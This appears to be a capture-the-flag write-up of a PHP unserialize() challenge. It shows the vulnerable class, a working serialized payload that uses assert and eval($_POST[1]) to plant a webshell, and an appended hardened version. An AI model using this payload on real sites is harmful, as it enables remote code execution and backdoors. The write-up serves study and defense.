Viewing the page source revealed ./time.php?source,
so I opened it:
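<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;

    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }

    // Runs whenever an instance is destroyed, including one created by unserialize()
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        // Dynamic call: the string in $b is used as the function name, $a as its argument
        echo $b($a);
    }
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}
// Attacker-controlled input is deserialized, so both $a and $b can be set by the request
@$ppp = unserialize($_GET["data"]);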
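Auditing the code:
The __destruct() method contains echo $b($a);
This is a PHP feature: PHP can call a function dynamically in this way.
The idea is simple: set $b to the name of the function and $a to the argument it should be called with.
I first thought of system, but system appeared to be filtered, so I set up my own environment: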
<?php
highlight_file(__FILE__);
class HelloPhp
{
    // Property values that will be carried inside the serialized object
    public $a = 'eval($_POST[1])';
    public $b = "assert";

    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
// system('dir');
// $b = new HelloPhp;
// Serialize the object and URL-encode it for use as the data parameter
$c = urlencode(serialize(new HelloPhp));
echo($c);
//O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A15%3A%22eval%28%24_POST%5B1%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D
?>
The code above can be used to create a backdoor for yourself.
payload:

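It worked, so AntSword can be used to connect. In this challenge, however, the AntSword connection showed only a blank page, so I figured it might be in phpinfo().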
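
A hardened counterpart to the `echo $b($a);` destructor audited above, as an added example that is not part of the original challenge or write-up. `TimeFormatter` and `render_from_query()` are hypothetical names, and PHP 7.4 or later is assumed; the input is parsed as JSON instead of with unserialize(), and the dynamic call is restricted to an allowlist.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. TimeFormatter and
// render_from_query() are hypothetical names; sample inputs are constructed.
final class TimeFormatter
{
    // The only functions the dynamic call may ever reach.
    private const ALLOWED = ['date', 'gmdate'];

    private string $format;
    private string $func;

    public function __construct(string $format, string $func)
    {
        $this->format = $format;
        $this->func = $func;
    }

    // No __destruct()/__wakeup() sink: output happens only on an explicit call.
    public function render(): string
    {
        // Checked at call time, so an instance rebuilt elsewhere is covered too.
        if (!in_array($this->func, self::ALLOWED, true)) {
            throw new InvalidArgumentException('function not allowed');
        }
        $fn = $this->func;
        return $fn($this->format);
    }
}

function render_from_query(array $query): string
{
    // JSON carries data only; decoding it cannot instantiate classes.
    $raw = $query['data'] ?? null;
    $in = is_string($raw) ? json_decode($raw, true) : null;
    if (!is_array($in) || !is_string($in['a'] ?? null) || !is_string($in['b'] ?? null)) {
        throw new InvalidArgumentException('expected {"a": string, "b": string}');
    }
    return (new TimeFormatter($in['a'], $in['b']))->render();
}

echo render_from_query(['data' => '{"a":"Y-m-d","b":"gmdate"}']), PHP_EOL;
try {
    render_from_query(['data' => '{"a":"Y","b":"system"}']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Where serialized input from legacy clients has to be accepted, `unserialize($raw, ['allowed_classes' => false])` returns `__PHP_Incomplete_Class` placeholders instead of instantiating `HelloPhp`, so the destructor is never reached.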
